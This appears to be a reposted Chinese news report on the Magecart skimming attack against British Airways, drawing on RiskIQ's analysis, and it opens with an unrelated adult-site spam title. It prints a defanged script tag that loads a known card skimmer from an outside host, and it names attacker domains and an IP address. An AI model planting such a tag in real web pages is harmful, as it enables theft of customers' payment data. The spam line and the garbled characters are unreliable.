压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

研究人員進行的調(diào)查顯示，英國航空公司數(shù)據(jù)泄露事件追查到是一個名為MageCart的犯罪團伙。該組織自2015年以來一直活躍，并且許多電子商務(wù)網(wǎng)站遭到破壞，以竊取支付卡和其他敏感數(shù)據(jù)。該小組在目標網(wǎng)站中注入一個skimmer?腳本來虹吸支付卡數(shù)據(jù)，一旦攻擊者成功破壞了網(wǎng)站，它就會在HTML模板中添加嵌入的Javascript。

下面是一個名為MagentoCore的示例腳本??。

<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>

此??腳本??記錄客戶的擊鍵并將其發(fā)送到受攻擊者控制的服務(wù)器。

攻擊者植入javascript代碼竊取數(shù)據(jù)

根據(jù)研究人員的說法，MageCart小組對英國航空公司進行了有針對性的攻擊，并使用該腳本的定制版本來進行持續(xù)性攻擊。

黑客使用專用基礎(chǔ)設(shè)施來對這家航空公司進行特定攻擊。

“這次襲擊中使用的基礎(chǔ)設(shè)施只是考慮到了英國航空公司，故意針對的腳本將與正常的支付處理融為一體，以避免被發(fā)現(xiàn)。我們在域名baways.com上看到了這方面的證據(jù)???以及丟棄服務(wù)器路徑。“

專家分析了網(wǎng)站加載的所有腳本，并搜索了最近的變化證據(jù)。

專家注意到Modernizr JavaScript庫中的一些變化，攻擊者在底部添加了一些代碼行，以避免給腳本帶來問題。JavaScript庫于格林威治標準時間8月21日20:49修改。

惡意腳本是從英國航空公司網(wǎng)站上的行李認領(lǐng)信息頁面加載的，攻擊者添加的代碼允許Modernizr將付款信息從客戶發(fā)送到攻擊者的服務(wù)器。

該腳本允許攻擊者從網(wǎng)站和移動應(yīng)用程序中竊取用戶的數(shù)據(jù)。

從英國航空公司竊取的數(shù)據(jù)以JSON的形式發(fā)送到baways.com上托管的服務(wù)器，該服務(wù)器類似于航空公司使用的合法域。

攻擊者使用SSL防止被發(fā)現(xiàn)

攻擊者從Comodo購買了SSL證書，以避免引起懷疑

“該域名???位于89.47.162.248，位于羅馬尼亞，實際上是位于立陶宛的名為Time4VPS的VPS提供商的一部分。演員還為服務(wù)器加載了SSL證書。有趣的是，他們決定使用Comodo的付費證書而不是免費的LetsEncrypt證書，這可能使它看起來像一個合法的服務(wù)器：“繼續(xù)RiskIQ。

目前還不清楚MageCart如何在英國航空公司網(wǎng)站上設(shè)法注入惡意代碼。

“正如我們在這次襲擊中看到的那樣，?Magecart?建立了定制的，有針對性的基礎(chǔ)設(shè)施，專門與英國航空公司網(wǎng)站融為一體，盡可能避免被發(fā)現(xiàn)。雖然我們永遠無法知道攻擊者在英國航空公司服務(wù)器上的覆蓋范圍，但他們能夠修改該站點的資源這一事實告訴我們訪問權(quán)限很大，并且他們可能在攻擊開始之前就已經(jīng)訪問了很久關(guān)于面向網(wǎng)絡(luò)的資產(chǎn)的脆弱性，這是一個明顯的提醒。“RiskIQ總結(jié)道。